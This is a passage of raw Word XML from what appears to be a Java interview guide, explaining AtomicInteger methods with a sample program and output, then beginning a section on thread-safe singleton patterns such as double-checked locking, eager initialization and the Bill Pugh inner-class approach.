    <w:p w14:paraId="0B45B750" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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getAndAdd(int delta):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C962792" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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tomically adds the given value (delta) to the current value and returns the old value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7778C5A8" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">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 oldValue = atomicInteger.getAndAdd(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F43B205" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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areAndSet(int expectedValue, int newValue):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13114A8D" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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tomically sets the value to the new value if the current value is equal to the expected value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1965C9E2" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">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oolean success = atomicInteger.compareAndSet(10, 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FEA197" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ddAndGet(int delta):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A0A6C" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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tomically adds the given value (delta) to the current value and returns the new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BED915" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">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 newValue = atomicInteger.addAndGet(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619ABA3E" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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Using AtomicInteger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E7BE89" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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concurrent.atomic.AtomicInteger;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085315C" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C37AF9" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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AtomicIntegerExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16519985" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537B4EEB" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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3C8F71C7" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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e an AtomicInteger with an initial value of 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660CA20D" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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tomicInteger atomicInt = new AtomicInteger(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB1C6DC" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78269C3E" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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nt the initial value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C44EACF" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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Initial Value: " + atomicInt.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF103CD" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B2BD260" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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Increment the value by 1 atomically and print the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B326CF1" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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After Increment: " + atomicInt.incrementAndGet());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488A18A4" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E0232B" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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Decrement the value by 1 atomically and print the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B20F6C" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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After Decrement: " + atomicInt.decrementAndGet());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06842B" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3409289C" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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dd 5 atomically and print the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67AAFB" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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After Adding 5: " + atomicInt.addAndGet(5));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1755DF" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C461B0F" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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tomically compare and set the value if the current value is 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2889007E" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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boolean isSet = atomicInt.compareAndSet(5, 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE4A6EF" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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ompare and Set (5 -&gt; 10): " + isSet);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4EB67" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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urrent Value: " + atomicInt.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09279A53" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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F5815B4" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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1457309" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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p w14:paraId="605ACF2C" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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itial Value: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CABFF4" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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fter Increment: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B32A0F8" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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fter Decrement: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6056462C" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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fter Adding 5: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CEFE64" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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are and Set (5 -&gt; 10): true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68023E8F" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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urrent Value: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3926D3EF" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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y Use AtomicInteger?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D4574" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 Safety without Locks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297E2D83" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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tomicInteger allows atomic updates on the integer value without using synchronization, which improves performance by avoiding the overhead of acquiring and releasing locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A4C12C" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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fficient for Counters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139392DF" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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is particularly useful in scenarios where multiple threads need to modify a shared counter or value concurrently (e.g., in parallel processing or multi-threaded applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F763F58" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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n-blocking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668CDA4" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ce atomic operations are performed without blocking, they help in reducing contention between threads and increase performance in high-concurrency environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5C8AC" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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to Use AtomicInteger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C103BE2" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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unters:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is commonly used for counters where atomic updates are needed (e.g., request counts, number of active threads, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D63F4B" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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safe increment/decrement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When the task requires incrementing or decrementing values by multiple threads concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4746F331" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ithout synchronization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you want to avoid the overhead of locking and synchronization but still need thread-safe operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC7B91" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76B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rawbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D1836" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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mited functionality:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> While AtomicInteger provides atomic operations for integer values, it only works with simple integer data types. For more complex types (like objects), you would need to use AtomicReference or other synchronization mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A67B61" w14:textId="77777777" w:rsidR="00E72974" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72974" w:rsidP="003C76BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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t suitable for all use cases:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is useful only for specific scenarios where atomic operations on integers are required. For more complex data manipulations, AtomicInteger may not be the right solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097D9F42" w14:textId="2330C25E"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22F1476">
          <v:rect id="_x0000_i1188" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613BF1B" w14:textId="4545D40C" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="00401728">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc196307541"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can you make a singleton class as thread safe</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="10D55674" w14:textId="378E24A8" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">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o make a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class thread-safe in Java, you need to ensure that the class's instance is created only once, even when multiple threads access it concurrently. There are different approaches to achieve thread safety, each with its own trade-offs in terms of performance and complexity. Below are the common ways to implement a thread-safe Singleton class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63626526" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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Lazy Initialization with synchronized block (Double-Checked Locking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF5ECF"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approach uses synchronization to ensure that the instance is created only once, while minimizing the performance overhead. The synchronized block is only used when the instance is null, and the double-checking avoids locking after the instance is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E751CA4"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ingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD89992"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atic volatile Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69882F48" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288AD4AB"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710D7318"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vate constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C054ACB"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21316F3" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116453E1"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F28BEB"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if (instance == null) { // First check (no synchronization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEA485"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nchronized (Singleton.class) { // Locking only once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752A363D"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instance == null) { // Second check (within synchronized block)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6FBDA4"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stance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCB239B"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821C1DC"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216D284"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096D145"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instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E70A34"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E7F20F8"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E2086C9" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DFABCE" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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volatile keyword ensures that the instance is properly visible to all threads and prevents the instance from being cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCECF0F" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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double-checked locking pattern ensures that synchronization is only done the first time the instance is created, reducing overhead in subsequent calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEA4863" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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Eager Initialization (Thread-Safe by Default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E80B47"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approach, the Singleton instance is created when the class is loaded, ensuring that the instance is created only once. Since the instance is created at the class loading time, this is thread-safe without any synchronization required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120592D0"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ingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADDFE3D"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atic final Singleton instance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F71B5" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B69F6DC"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B30220C"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vate constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1097152E"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F1451FE" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199A2D4E"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC8CD5F"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instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147B8CA8"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2CFC605"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7ECA879" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08110F" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42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instance is created when the class is loaded, and Java guarantees that class loading is thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298343E4" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42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synchronization is needed here, making this method efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD05AB2" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42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downside is that the instance is created regardless of whether it is used or not, which could be inefficient if the instance is never used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73342279" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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Bill Pugh Singleton Design (Using Static Inner Class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321B648F"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is a highly efficient and thread-safe approach. The Singleton instance is created when the static inner class is accessed for the first time, and the Java ClassLoader mechanism ensures that the instance is created lazily and thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED8B4D"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ingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37060282"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9B0087"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vate constructor to prevent instantiation</w:t>
